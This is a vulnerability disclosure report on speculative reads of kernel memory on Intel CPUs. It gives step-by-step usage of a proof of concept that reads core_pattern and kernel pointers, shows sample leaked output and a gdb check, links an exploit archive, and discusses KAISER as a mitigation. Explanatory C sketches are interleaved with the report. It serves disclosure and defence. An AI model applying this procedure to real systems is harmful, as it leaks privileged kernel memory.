== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and (to some extent) ARM.

I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000 bytes per second from Linux kernel memory after a
~4-second startup, in a 4GiB address space window, with the ability to
read from arbitrary offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.

On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests) from inside a KVM guest.

The attack doesn't seem to work as well on ARM, perhaps because ARM
CPUs perform less speculative execution as a result of a different
performance/energy tradeoff.

All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing thresholds.

############################################################

On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3").
So far, we have not managed to leak information this way on AMD or ARM CPUs.

 - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
 - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)

Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:

 - If the address is not mapped (perhaps also under other
   conditions?), instructions that depend on the load are not executed.
 - If the address is mapped, but not sufficiently cached, the load loads zeroes.
   Instructions that depend on the load are executed.
   Perhaps Intel decided that in case of a sufficiently high-latency load,
   it makes sense to speculate ahead with a dummy value to get a chance to
   prefetch cachelines for dependent loads, or something like that?
 - If the address is sufficiently cached, the load loads the data stored at the
   given address, without respecting the privilege level.
   Instructions that depend on the load are executed.
   This is the vulnerable case.
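
The three cases above can be written down as a toy model. This is only a
restatement of the observed behavior in C, not code from the PoC and not a
description of how the hardware is implemented; the struct and function
names are made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Observed outcome of a ring-3 speculative load from a kernel address. */
struct spec_load_result {
    bool dependents_execute; /* do instructions that depend on the load run? */
    uint8_t value;           /* value they see, if they run */
};

/* Hypothetical model function; "secret" is the byte stored at the address. */
struct spec_load_result model_spec_load(bool mapped, bool cached, uint8_t secret)
{
    struct spec_load_result r = { false, 0 };

    if (!mapped)
        return r;                  /* case 1: dependents are not executed */

    r.dependents_execute = true;
    r.value = cached ? secret : 0; /* case 3 leaks the byte, case 2 yields zero */
    return r;
}
```

One consequence visible in the model: a zero result is ambiguous, since it
can mean either "mapped but not cached" or "cached and really zero".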

I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:

As root, determine where the core_pattern is in the kernel:

=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====
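
If you would rather do this lookup from a program than with grep, a minimal
sketch of parsing one /proc/kallsyms line could look like the following. The
helper name kallsyms_match is hypothetical and not part of the attached PoC;
it assumes the usual "<hex address> <type> <name>" line layout shown above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one kallsyms line and, if the symbol name equals `wanted`,
 * store its address in *addr. Returns 1 on a match, 0 otherwise.
 */
int kallsyms_match(const char *line, const char *wanted, uint64_t *addr)
{
    unsigned long long value;
    char type;
    char name[256];

    /* "%255s" stops at whitespace, so a trailing "[module]" tag is ignored. */
    if (sscanf(line, "%llx %c %255s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;

    *addr = (uint64_t)value;
    return 1;
}
```

A caller would read /proc/kallsyms line by line (for example with fgets) and
stop at the first line for which kallsyms_match(line, "core_pattern", &addr)
returns 1.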

Then, as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it) from
kernel memory, using the pointer from the previous step:

=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0  2f 63 6f 72 65 73 2f 25  45 2e 25 70 2e 25 73 2e  |/cores/%E.%p.%s.|
ffffffff81e8aeb0  25 74 00 61 70 70 6f 72  74 20 25 70 20 25 73 20  |%t.apport %p %s |
ffffffff81e8aec0  25 63 20 25 50 00 00 00  00 00 00 00 00 00 00 00  |%c %P...........|
[ zeroes ]
ffffffff81e8af20  c0 a4 e8 81 ff ff ff ff  c0 af e8 81 ff ff ff ff  |................|
ffffffff81e8af30  20 8e f0 81 ff ff ff ff  75 d9 cd 81 ff ff ff ff  | .......u.......|
[ zeroes ]
ffffffff81e8bb60  65 5b cf 81 ff ff ff ff  00 00 00 00 00 00 00 00  |e[..............|
ffffffff81e8bb70  00 00 00 00 6d 41 00 00  00 00 00 00 00 00 00 00  |....mA..........|
[ zeroes ]

real    0m13.726s
user    0m9.820s
sys     0m3.908s
=====

As you can see, the core_pattern, part of the previous core_pattern (behind the
first null byte) and a few kernel pointers were leaked.

To confirm that the rest of the leaked kernel data is correct, use gdb as
root to read kernel memory:

=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20:     0xffffffff81e8a4c0      0xffffffff81e8afc0
0xffffffff81e8af30:     0xffffffff81f08e20      0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60:     0xffffffff81cf5b65      0x0000000000000000
0xffffffff81e8bb70:     0x0000416d00000000      0x0000000000000000
=====
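
To compare the PoC's byte-wise hexdump with the 64-bit words printed by gdb,
the leaked bytes have to be read as little-endian values. A small sketch of
that conversion follows; both function names are hypothetical, and the
"looks like a kernel pointer" check is only a rough heuristic that assumes the
usual x86-64 Linux kernel image mapping in the top 2GiB of the address space.

```c
#include <stddef.h>
#include <stdint.h>

/* Assemble 8 leaked bytes (little-endian, as on x86-64) into one 64-bit word. */
uint64_t le64_from_bytes(const uint8_t *p)
{
    uint64_t v = 0;

    for (size_t i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Heuristic (assumption): values in the top 2GiB point into kernel mappings. */
int looks_like_kernel_image_pointer(uint64_t v)
{
    return v >= 0xffffffff80000000ULL;
}
```

For example, the leaked bytes c0 a4 e8 81 ff ff ff ff at ffffffff81e8af20
decode to 0xffffffff81e8a4c0, which is the first word gdb prints for that
address.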

Note that the PoC will report uncached bytes as zeroes.


To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.

We have not yet tested whether this still works after a TLB flush.


Regarding possible mitigations:

A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220 (cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER

Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur while for a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out, except for the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.
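
As a rough illustration of the pagetable split described above, here is a toy
model in C. It is not KAISER's code: the function and macro names are made
up, it assumes an x86-64 top-level pagetable with 512 entries whose upper
half belongs to the kernel, and it treats "needed by the entry code" as a
per-entry flag, which glosses over details a real implementation has to
handle.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOP_LEVEL_ENTRIES 512 /* entries in an x86-64 top-level pagetable */
#define FIRST_KERNEL_SLOT 256 /* assumption: upper half is kernel-only */

/*
 * Derive the top-level pagetable used while executing userspace code from
 * the kernel's one. Userspace entries are copied; kernel-only entries are
 * zeroed unless they are flagged as required by the entry code.
 */
void build_user_view(const uint64_t kernel_view[TOP_LEVEL_ENTRIES],
                     const bool needed_for_entry[TOP_LEVEL_ENTRIES],
                     uint64_t user_view[TOP_LEVEL_ENTRIES])
{
    for (size_t i = 0; i < TOP_LEVEL_ENTRIES; i++) {
        bool kernel_only = i >= FIRST_KERNEL_SLOT;

        if (!kernel_only || needed_for_entry[i])
            user_view[i] = kernel_view[i];
        else
            user_view[i] = 0; /* not present while in userspace */
    }
}
```

In this model the kernel keeps using kernel_view unchanged, and the switch
between the two tables would happen on every kernel entry and exit.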

I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip